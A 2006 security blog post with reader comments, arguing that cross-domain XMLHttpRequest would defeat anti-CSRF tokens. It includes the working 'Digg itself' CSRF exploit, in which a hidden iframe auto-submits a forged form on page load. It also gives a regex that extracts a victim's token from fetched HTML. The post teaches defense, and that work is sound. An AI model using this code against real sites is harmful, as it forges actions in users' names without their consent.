About the Author

Chris Shiflett

Hi, I’m Chris: web craftsman, community leader, husband, father, and partner at Fictive Kin.


Cross-Domain Ajax Insecurity

I might turn this into a more coherent article. For now, this ad hoc explanation will have to suffice.

Since the birth of Ajax (the name, not the technology), there has been an increased interest in various client-side technologies, especially JavaScript. Those who have forged ahead in an attempt to innovate new ways of applying Ajax have inevitably run into the same-origin security policy of XMLHttpRequest(). As a result, there has been an increasing demand for cross-domain Ajax, and there are several creative techniques in use today to get around the same-origin restriction (none of which I consider cross-domain Ajax).
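For readers unfamiliar with those workarounds, here is a sketch (mine, not from the post) of the most common one: <script> elements are not bound by the same-origin policy, so a page can load cross-domain data by asking the remote server to wrap its response in a function call (the pattern later named JSONP). The URL, callback name, and helper function here are all hypothetical.

```javascript
// Build a script tag pointing at a remote endpoint that is expected to
// respond with: callbackName({...});
function buildJsonpTag(url, callbackName) {
  return '<script src="' + url + '?callback=' +
         encodeURIComponent(callbackName) + '"><\/script>';
}

// In a browser, you would define window.handleData and write this tag into
// the document; the remote response then executes as ordinary script.
```

Note that this is exactly why such techniques aren't really "cross-domain Ajax": the remote server must cooperate, and the response executes as code rather than being read as data.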

Today, I read a post from a Ruby developer who claims to debunk misconceptions about the security implications of cross-domain Ajax:

Quite a number of people have been discussing possible cross-domain Ajax security issues recently. These are smart people that generally know their technologies very well, but for some reason are missing some fundamental aspects about Ajax.

He goes on to explain why he thinks cross-domain Ajax is safe. A follow-up retraction attempts to point out one reason why cross-domain Ajax can be unsafe: a port scanner with access to your local network.

We don't need cross-domain Ajax for that. I wrote an article three years ago (and was giving talks before that) that demonstrates how XSS and CSRF can be used to penetrate local networks. Jeremiah Grossman recently demonstrated how to use XSS to scan a local network. We even have an example that uses CSRF to make configuration changes to a Linksys WRT54G wireless router. These things are already possible today.

A much more important concern is that cross-domain Ajax effectively eliminates the CSRF safeguard implemented by many web applications. (The rest are probably vulnerable.) To help explain this, consider the recent "story that Diggs itself," a clever CSRF attack that causes all visitors to automatically Digg a particular story:

<script type="text/javascript">
function fillframe() {
    // Grab the hidden iframe defined below
    var mf = window.frames["myframe"];

    // Build a form that mimics a legitimate Digg submission
    var html = '<form name="diggform" action="http://digg.com/diginfull" method="post">';
    html += ' <input type="hidden" name="id" value="367034"/>';
    html += ' <input type="hidden" name="orderchange" value="2"/>';
    html += ' <input type="hidden" name="target" value="http%3A//digg.com/"/>';
    html += ' <input type="hidden" name="category" value="0"/>';
    html += ' <input type="hidden" name="page" value="0"/>';
    html += ' <input type="hidden" name="t" value="undefined"/>';
    html += ' <input type="hidden" name="row" value="1"/>';
    html += '</form>';

    // Write the form into the invisible iframe and submit it on the visitor's behalf
    mf.document.body.innerHTML = html;
    mf.document.diggform.submit();
}
</script></head>
<body onload="fillframe();">
<iframe name="myframe" style="width:0px;height:0px;border:0px"></iframe>

There are easier ways to craft this exploit, but that's too off-topic for now.

This exploit no longer works, because Digg fixed it. How did they do that? The request that this generates comes from a valid user and appears to be legitimate, because it abides by the rules imposed by the application. If you spend some time thinking about it, you might be able to come up with a solution, and it will probably be similar to what most people call an anti-CSRF token. Digg now adds a token to its forms. If you Digg a story, your request includes digcheck in addition to the other pieces of relevant information:

id=12345&orderchange=0&target=http%3A//digg.com/&category=security&page=1&t=1&row=1&digcheck=412e11d5317627e48a4b0615c84b9a8f

This value changes and is not valid for any other user or any other story. If digcheck doesn't match, the action is considered invalid. Problem solved.

If you want to exploit Digg in the same way today, you'd need to be able to obtain the digcheck token of another user. If you want to exploit many users (which you probably do, if you want your story to be popular), you'd need to be able to automatically get another user's token, so that it's easy to repeat the process. If you visit Digg and view source, you'll find these tokens in the links to Digg a story. Of course, the tokens you see are only valid for requests from you.

<a href="javascript:wrapper_full(0,5,12345,0,'Security',1,1,'412e11d5317627e48a4b0615c84b9a8f')">digg it</a>

Now, imagine if XMLHttpRequest() allowed cross-domain requests. Because it is JavaScript and executes on the client, you could use it to generate requests to Digg from every user who visits a page that you create elsewhere. You'd also be able to parse the results of those requests, so you could determine each user's digcheck token for the story you wish to have them Digg. The result? The exact same scenario would be possible, and there is nothing Digg could do about it. In fact, there's nothing any web application could do about it.
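A sketch of why the ability to read the response is the fatal part: if cross-domain XHR existed, the attacker's page could fetch digg.com's HTML in the victim's session and pull the digcheck token out of the "digg it" links with one regular expression. (extractDigcheck is a hypothetical helper name; the link format is the one shown above.)

```javascript
// Recover the victim's digcheck token from a fetched page
function extractDigcheck(html) {
  // The last argument to wrapper_full() is the 32-character hex token
  var m = html.match(/wrapper_full\([^)]*'([0-9a-f]{32})'\)/);
  return m ? m[1] : null;
}
```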

I don't expect browser developers to dismiss the same-origin security policy without a thorough understanding of the consequences, so my only purpose in blogging this is to clear up some of the misinformation that has been published in various places. It's worth noting that XSS vulnerabilities allow malicious JavaScript to execute within your domain, thereby avoiding the same-domain restrictions. This can have catastrophic consequences. Just ask Myspace.

I'll probably be writing more about Ajax security in the coming months. In the meantime, you should peruse Andrew's Ajax Security PDF.

About this post

Cross-Domain Ajax Insecurity was posted on Wed, 09 Aug 2006.

26 comments

1.The Hater said:

Still waiting for something beyond the combination of a buzzword (Ajax) and fear (OMG YOU'LL GET HAXXXORED!) as to what makes Ajax fundamentally different when it comes to web application security. If you pull in JSON from another domain and execute it, that doesn't make Ajax vulnerable, that makes you an idiot (not that you have; I just chose an exaggerated example to make a point).

I see more and more posts on Ajax security and when it comes down to it, I just see developers trying to cover their own asses after jumping on the bandwagon without thinking it through first. Then they think they can cover up their own stupidity by pretending they've uncovered a whole new paradigm of web application security when XSS and SQL injection attacks have existed long before widespread Ajax use.

So, yeah...

Let me know when you find something new.

Wed, 09 Aug 2006 at 15:38:14 GMT Link


2.Chris Shiflett said:

You're right that most concerns are no different, but I think you might be making a mistake that I see a lot - considering the security implications only from the perspective of the developer making the Ajax calls.

As this post illustrates, Ajax can also be a tool used by an attacker, so it's important to consider that perspective as well. The Myspace worm would not have been possible without Ajax, so it's naive to think there's nothing new.

Wed, 09 Aug 2006 at 15:46:54 GMT Link


3.The Hater said:

Actually, no. The magic "never trust the user/input" rule still applies. I ALWAYS assume someone will abuse Ajax calls, since not doing so opens up the web application to all of the normal vulnerabilities I take into account when someone simply logs into an application.

Once again, this comes down to the standard rules that developers have ignored in their eagerness to stick a shiny, new acronym on their list of skills or in the title of their new article.

Wed, 09 Aug 2006 at 15:54:58 GMT Link


4.Chris Snyder said:

I don't understand the desire to completely abandon server-side technologies in favor of putting everything on the client. Changing XHR to allow cross-domain requests is not just a bad idea from a security standpoint, it's also a scalability and reliability issue.

Using a server-side proxy allows you (the provider) to cache requests, to verify the content being served on "your" pages, and to gracefully handle the inevitable "unable to connect" errors that will occur when the other domain goes down for some reason.

Not only is it easy to proxy requests, it's the right and responsible thing to do.

Wed, 09 Aug 2006 at 16:01:48 GMT Link


5.Chris Shiflett said:

The Hater,

You should read more about cross-site request forgeries (CSRF). It is one example of an attack that's immune to FIEO (filter input; escape output) alone.

Or, perhaps just try to think of a way Digg could have prevented the self-submitting story by applying the "never trust the user/input rule" that you have noted.

Better yet, try to think of an exploit Samy could have used on Myspace that does not involve Ajax but achieves the same results.

Wed, 09 Aug 2006 at 16:05:16 GMT Link


6.Chris Shiflett said:

Chris,

I agree with you for the most part, but I'm not sure that pushing more responsibility to the client is necessarily a poor scalability decision. As load increases, so does the number of clients who can perform the work. The same cannot be said for your proxy; it seems like a potential bottleneck.

I agree that the proxy technique eliminates the security risks identified in this post. If I knew more about Flash, I'd research the potential implications of cross-domain Ajax using Flash:

http://blog.monstuff.com/Flash4AJAX...ic/Xdomain.html

My initial observation leads me to believe that the target site has to allow these requests in a file called crossdomain.xml.
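For reference, that opt-in looks something like the following: Flash fetches /crossdomain.xml from the target site before allowing the request, and the file lists which calling domains are permitted.

```xml
<?xml version="1.0"?>
<cross-domain-policy>
  <!-- "*" permits cross-domain requests from any site;
       list specific domains instead to restrict access -->
  <allow-access-from domain="*"/>
</cross-domain-policy>
```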

Wed, 09 Aug 2006 at 16:15:36 GMT Link


7.The Hater said:

I didn't imply that everything came down to filter input, escape output issues. I mean that so far I have yet to see a brand-new vulnerability opened up by the use of Ajax. I see instances where the stakes have risen, since it can spread faster, but I see no fundamentally new vulnerabilities.

Cross-site request forgeries existed before Ajax and you can attack non-Ajax driven sites with it. So why even bring that up? Each example you give me has avoided or muddied the issue rather than actually answering it.

I repeat: Let me know when you find something new.

At this point I should probably point out that I don't pretend to have all the answers or know everything on the subject. I DO, however, have a fair amount of experience and strive to learn more to offer users a better interface while protecting the application/data against everything I can. So before this breaks down into another Shiflett/Esser bitch-fest, please try to keep that in mind. I want to explore this in order to sort things out, not start flame-wars.

Wed, 09 Aug 2006 at 16:17:19 GMT Link


8.Chris Shiflett said:

The Hater,

You'll have a difficult time accusing me of entering into a "bitch fest" with anyone. That's just not my personality.

The reason I bring up CSRF is because it is very relevant to this discussion. Myspace did not have a CSRF vulnerability when it was exploited. Without Ajax, it would have been impossible for Samy to get around their CSRF safeguard. This safeguard is alluded to in point 9 here:

http://namb.la/popular/tech.html

I think it's impossible for a web application to protect against CSRF if it is vulnerable to XSS. (This statement would not be true without Ajax.) I also think it's impossible for any web application to protect against CSRF attacks if cross-domain Ajax is allowed. It's the same risk.

Both XSS and cross-domain Ajax avoid the same-domain security policy, and this post simply tries to explain why that policy is important.

Wed, 09 Aug 2006 at 16:32:15 GMT Link


9.The Hater said:

I disagree. I think that Ajax makes it easier for attackers to exploit these vulnerabilities, but when broken down they don't have anything new about them.

Point 9 on that page looks like a XSS issue. In fact, it looks like the use of the XMLHttpRequest object (and the exploit in its entirety) comes from code injected into the page and not Ajax-driven functionality of MySpace itself.

So, in essence, it seems to me that your post raises several very valid points, but unnecessarily brings Ajax into it. I don't even really see an example of Ajax used to attack until the very end when you say,"Now, imagine if XMLHttpRequest() allowed cross-domain requests."

Wed, 09 Aug 2006 at 16:45:33 GMT Link


10.Chris Shiflett said:

> I disagree.

With which part? You disagree that the same-domain security policy has value?

> Point 9 on that page looks like a XSS issue.

The issue Samy raises is similar to the issue with the self-submitting Digg story. If you wanted to reproduce that exploit today, you would need to be able to obtain the digcheck token of each user who visits your page.

Myspace generates a random token on the verification page for adding a friend. (This safeguard was in place before Samy's worm.) In order to add a friend, your request must include the token that was generated for you on the previous page. It's the same issue.

Without Ajax, it's easy to get a user to submit a request of your choosing (CSRF), but if you want to get a user's token, you need to be able to parse the response to such a request.

> In fact, it looks like the use of the XMLHttpRequest object (and the exploit in its entirety) comes from code injected into the page and not Ajax-driven functionality of MySpace itself.

Yes, of course. This is what I was trying to explain before when I thought you might be considering this from the wrong perspective. (I'm still not sure whether you are - I'm just trying to be clear.) Ajax was used as a tool in the attack, not by Myspace. (Myspace might use Ajax, but that's irrelevant to this particular discussion.)

I agree with you that adding Ajax features to a web application doesn't introduce security implications that weren't already present (although it can make it easier to make a mistake), but I disagree with your assertion that Ajax doesn't introduce anything new.

Despite the XSS vulnerability, the Myspace worm would not have been possible without Ajax. That seems like proof enough to me.

> I don't even really see an example of Ajax used to attack until the very end when you say, "Now, imagine if XMLHttpRequest() allowed cross-domain requests."

I hope you don't judge this post too harshly, because it was written in haste. (I wasn't kidding about it being ad hoc.) I admit that it takes me a while to get to the point, but the point is that the self-submitting Digg story (an example of CSRF that I think most people can understand) would still be possible if browsers supported cross-domain Ajax, despite the digcheck token.

Wed, 09 Aug 2006 at 17:57:26 GMT Link


11.The Hater said:

> With which part? You disagree that the same-domain security policy has value?

Nope, I disagree on the difficulty of accusing you of entering bitch-fests (*JOKING*).

Really, I disagreed with your statement that,"Without Ajax, it would have been impossible for Samy to get around their CSRF safeguard." It would have proved more difficult, maybe - but not impossible. I'd try to put together a proof-of-concept, but I don't have the time and I don't care that much.

> I agree with you that adding Ajax features to a web application doesn't introduce security implications that weren't already present (although it can make it easier to make a mistake)...

Thank you! I think we've started to understand one another's points.

> ...but I disagree with you that Ajax doesn't introduce anything new.

..wait, what?

> Despite the XSS vulnerability, the Myspace worm would not have been possible without Ajax. That seems like proof enough to me.

MySpace (last I checked...I can't stand the site so I don't keep up on it) allows or allowed Flash, right? You could easily have altered the worm to use Flash's data transfer calls to accomplish the same result in a browser that doesn't support the XMLHttpRequest object. If not Flash, I bet either of us could think of another way if we put our minds to it.

> I hope you don't judge this post too harshly, because it was written in haste. (I wasn't kidding about it being ad hoc.) I admit that it takes me a while to get to the point, but the point is that the self-submitting Digg story (an example of CSRF that I think most people can understand) would still be possible if browsers supported cross-domain Ajax, despite the digcheck token.

The only thing I really, truly despise about the post and similar posts by other developers: the post comes across to me as focusing on Ajax and vulnerabilities that it supposedly brings into an application when, in fact, its availability to attackers should merely reinforce the rules we already know and love and teach. Web Application Security seems to have taken a backseat to everyone crowding around the word "Ajax" rather than using it to extend the ideas. I realize that makes a difficult balancing act, but it always does when a new implementation (or, at least, freshly used implementation) comes into play so rapidly.

Wed, 09 Aug 2006 at 18:31:14 GMT Link


12.cooperpx said:

Dear People, Digest Authentication covered this crap a long time ago. It's not perfect, but it covers all the basics.

If you can't turn on Digest Auth, then you can approximate it in javascript + part of your XML/JSON request handler. Look for a solid MD5 implementation in js as a starting point.

MySpace got exploited because it didn't properly authenticate the source request, made worse by other stupidity. The root of THE PROBLEM IS NOT AJAX, Ajax just made it worse ... faster. They could have had these same holes exploited using different means.

Let's not get rid of power tools because any idiot could chop off a finger. Some of us want to provide public services, easily used, via XHR, that do not need to be locked down. Some of us actually even have the smarts/experience to properly lock down our web applications.

For the rest of you: If I am not mistaken Microsoft's ASP.NET platform, with or without ATLAS, has everything Digg needed built in. Digg obviously elects not to use .NET, and I cannot blame them, but at least they could have learned from them. It's all moot now, because they learned their lesson the hard way.

All I ask is that the pitchforks be put down and not burn all the suspects.

Wed, 09 Aug 2006 at 18:31:21 GMT Link


13.Chris Shiflett said:

If you consider Ajax to be any technology that allows you to send/receive HTTP requests/responses from a client-side context, I would be very interested to see an example exploit that replaces Samy's use of XMLHttpRequest() with something that isn't Ajax.

> The post comes across to me as focusing on Ajax and vulnerabilities that it supposedly brings into an application when, in fact, its availability to attackers should merely reinforce the rules we already know and love and teach.

I think I understand your point, and it's valid. Most Ajax security concerns I've seen raised have fallen into this category - they just emphasize what we already know.

But, I think you're unfairly dismissing the point I'm trying to raise, which is that the same-domain policy is important. (Our tangential discussion has been whether Ajax matters at all, and on this point, I think we might just have to agree to disagree.)

I'm no JavaScript expert, but I'll try to craft an exploit that perhaps explains my point much better than I can with words. IE has a configuration option to allow cross-domain Ajax, so that makes a good target platform.

Wed, 09 Aug 2006 at 19:04:45 GMT Link


14.Andrew van der Stock said:

I posted a few days ago to SC-L on ways we can improve the security model for XHR's. It should be up to the primary page to nominate additional sites they'd like to talk to via the XHR request, and then cut off any further changes.

Couple that with a function to declare some fields off limits to the DOM, I think we can satisfy the requirements of both the developers who are keen on (ab)using XHR as well as the users who expect that the apps they use will not compromise them.

eg:

// Before the next line, act as per current JS security model (i.e., none) for compatibility
document.perm.openassert();               // start permissions assertion
// By default, all permissions are now denied
document.perm.assert('xhr', true);        // allow XMLHttpRequest to run
document.perm.assert('eval', true);       // allow eval (necessary evil for most XHR / JSON)
document.perm.assert('xd', true);         // allow resources from other than the source domain, but they must be specified with addsourcedomain()
document.perm.addsourcedomain('foo.com'); // allow another domain to be accessible by code
document.perm.endassert();                // no more permission entries will be obeyed after this line

Wed, 09 Aug 2006 at 19:10:21 GMT Link


15.The Hater said:

> If you consider Ajax to be any technology that allows you to send/receive HTTP requests/responses from a client-side context, I would be very interested to see an example exploit that replaces Samy's use of XMLHttpRequest() with something that isn't Ajax.

I don't. I consider the use of the XMLHttpRequest object in that manner Ajax. I consider using Flash to be using Flash, using iframes an ugly hack, using image sources an ugly hack, and most other hacks ugly hacks.

> But, I think you're unfairly dismissing the point I'm trying to raise, which is that the same-domain policy is important. (Our tangential discussion has been whether Ajax matters at all, and on this point, I think we might just have to agree to disagree.)

I think we actually agree when it comes down to each particular point, though we apparently disagree on agreeing. No more meta-discussion for me, though...

> I'm no JavaScript expert, but I'll try to craft an exploit that perhaps explains my point much better than I can with words. IE has a configuration option to allow cross-domain Ajax, so that makes a good target platform.

I would very much like to see that. And I didn't know IE had that option, where can I find it so I can make freakin' sure it never gets activated?

Wed, 09 Aug 2006 at 19:52:23 GMT Link


16.Chris Shiflett said:

The IE configuration option is described as "access data sources across domains."

Wed, 09 Aug 2006 at 20:03:42 GMT Link


17.James Ward said:

First of all, cross-domain XHR is a really bad idea, especially when combined with XSS attacks. But that's not what my comment is about. We can talk all we want about cross-domain XHR, we can try to get something approved by the W3C, and then we can try to get the browser vendors to implement it. Now honestly, how long is all that going to take? At best we are probably looking at 3 years. And that is assuming that our friends in Redmond decide they actually want to continue enhancing a platform that devalues their own cash cow. But let's assume that happens. Now how long before a large enough percentage of users get this new browser with cross-domain XHR that we could actually use it in our web applications? Quite a long time... And this is the reason why I'm a Flex developer. The Flash Virtual Machine has the functionality now, plus a bunch of other things the browser can't do. Oh yeah, and 98% of PCs worldwide have Flash 6 or better.

So we can talk all we want about how great it would be to have feature x, or we can spend time actually building applications that do it. I choose the latter with the free Flex SDK.

Disclaimer: I now work for Adobe because I fell in love with Flex.

Wed, 09 Aug 2006 at 21:26:57 GMT Link


18.Julien Couvreur said:

Hi Chris,

You are correct: cross-site requests in Flash require an explicit opt-in from the server, using the crossdomain.xml. That file not only needs to be there, it also needs to identify which foreign domains are allowed to do cross-site requests (which is '*', a wildcard, in most public websites I've seen so far, like Yahoo, Amazon, etc.).

On the other hand, Flash does send the user's cookies.

More generally, in terms of CSRF and form keys (the workaround for the CSRF problem), one could argue that the current design of the web is broken: why allow POSTs from the browser across sites in the first place? Why not enforce that the browser clearly identify the source of such requests?

Regarding: "Now, imagine if XMLHttpRequest() allowed cross-domain requests."

I don't think that anyone is suggesting that the "same-site policy" of XHR should simply be removed. This obviously leads to a very insecure and dangerous environment.

Here are some variants that seem more reasonable and can be combined:

-XHR across domains doesn't get any cookies sent

-XHR requests across domains are clearly labelled as such (server can choose how to handle them)

-XHR across domains requires explicit opt-in from server

Wed, 09 Aug 2006 at 21:34:58 GMT Link


19.Joseph Crawford said:

Chris,

This is a very informative article. As I have clients who wish that I learn Ajax (I have yet to start), I will definitely have to take a look at that security PDF.

Thanks for the heads up on how important AJAX security is.

Wed, 09 Aug 2006 at 23:01:42 GMT Link


20.cooperpx said:

James has it right: Adobe did good with crossdomain.xml and Flex.

Add a similar thing for XHR and guess what, it doesn't solve SQUAT. 'Cause you have Frames, external css, external javascript, images, xml src=, client http tools, current and future browser bugs, and site breakins.

The real reason why people are making a fuss out of "Ajax Insecurity" is because Script Injection / Script Untrust is no longer a trivial concern. The browser (& common folk) can do some freaky cool shit now, and them people are too ignorant to realize what exploits they leave themselves open to.

Here's my solution, the one that's hard work ... the one that doesn't automagically solve everyone's problems overnight.

Trust nobody (except yourself). The only foreign input or resources you should use, is the stuff you can validate before it initializes. ie: Don't include foreign Java, Javascript, Flash, or Objects in your pages... just the ones *only you* have write access to, or ability to validate.

If you do this, then you're free and clear. You've technically SOLVED [your] security issues with the current web platform as we know it.

Of course, all bets are off if somebody gets write access to your files, impersonates your site, or a clients' own compromised installation is used against them. But that isn't within the realm of AJAX or any implementation thereof.

Wed, 09 Aug 2006 at 23:55:44 GMT Link


21.James Burke said:

I know at least some people involved in Firefox have contributed to a discussion with the W3C's webapi group to allow cross domain XHR. See this tracking bug (with a link to the webapi group's proposal):

https://bugzilla.mozilla.org/show_bug.cgi?id=333906

On a related note, I just checked in code to the Dojo Toolkit to allow cross domain XHR by shuttling the XHR request and response between two iframes:

http://dojotoolkit.org/~jburke/XHRIFrameProxy.html

In order for the technique to work, the server has to do an explicit opt-in, and the server can control what URLs have access to what types of requests. These are similar protections to those mentioned in the webapi proposal, but in the iframe proxy approach, some of the protections are done in JavaScript.
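A sketch of the shuttle mechanism (my own illustration, not Dojo's actual code): the two frames cannot read each other's documents across domains, but each is allowed to set the other's location, so messages travel through the URL fragment in encoded form. The helper names are hypothetical.

```javascript
// Encode a message into a fragment the other frame can poll for
function encodeFragmentMessage(id, payload) {
  return '#' + id + ':' + encodeURIComponent(payload);
}

// Decode it on the receiving side; returns null for anything malformed
function decodeFragmentMessage(fragment) {
  var m = fragment.match(/^#([^:]+):(.*)$/);
  if (!m) return null;
  return { id: m[1], payload: decodeURIComponent(m[2]) };
}

// In the browser, the sender would do something like:
//   otherFrame.location = proxyUrl + encodeFragmentMessage('req1', body);
// and the receiver would poll location.hash for new messages.
```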

Thu, 10 Aug 2006 at 04:48:27 GMT Link


22.Manuel said:

Honestly, you two seem like a couple of kids arguing over something you're never going to agree on.

Talking about Ajax and tech is like talking about God himself. Religion will always be something inexplicable; the same goes for IE, M$, Ajax, JS, etc.

Mon, 18 Sep 2006 at 16:23:57 GMT Link


23.Pedram Nimreezi said:

In response to: document.perm.assert('eval', true); // allow eval (necessary evil for most XHR / JSON)

JSON doesn't need to be eval'd; it can be parsed. Random data coming off the internet should never be eval'd. The only reason eval even works in this context is because it's JavaScript. JSON.org's parseJSON is many times safer, though.
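The distinction can be shown in a couple of lines (modern JavaScript ships JSON.parse natively; in 2006 this meant json.org's parseJSON):

```javascript
var payload = '{"id": 367034}';

// eval executes whatever the string contains, data and attack code alike:
//   var data = eval('(' + payload + ')');   // never do this with untrusted input

// A parser accepts only the JSON grammar, so code can't sneak through:
var data = JSON.parse(payload);

// JSON.parse('alert(1)') would throw a SyntaxError instead of running code.
```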

Fri, 10 Aug 2007 at 23:18:36 GMT Link


24.Girish said:

Well, JSON is a good technique, agreed. But the fact is that JSON cannot be used to port applications currently built on Ajax into their cross-domain versions.

Another problem is handling the cookies. Suppose the current web app running on www.xyx.com sets a cookie, xyxID. A normal same-domain Ajax call would have access to xyxID. But if I call xyx.com from xyz.com, the cookie would have to be explicitly sent back to xyx.com to be set. This creates another problem.

For that we still need a normal Ajax call.

An article

<a href ="http://icodeleague.110mb.com/cmsimple/index.php?Website_Development:Cross_Domain_AJAX">http://icodeleague.110mb.com/cmsimple/index.php?Website_Development:Cross_Domain_AJAX</a>

suggests the use of combined Ajax, a proxy, and an IFRAME to get around it. I liked the approach (I wrote it, that's why), but somehow it's a little complicated.

Fri, 16 Nov 2007 at 18:12:36 GMT Link


25.Girish said:

http://icodeleague.110mb.com/cmsimp...oss_Domain_AJAX

Sorry, this is the link.

Fri, 16 Nov 2007 at 18:14:14 GMT Link


26.Michael said:

Also, a little note: the Digg trick would only work if you had your privacy settings set to "Allow all cookies"; otherwise, the cookie/session would not work across the iframe. Or is there an easy way to inject the cookie/session?

Sun, 25 Nov 2007 at 07:05:32 GMT Link

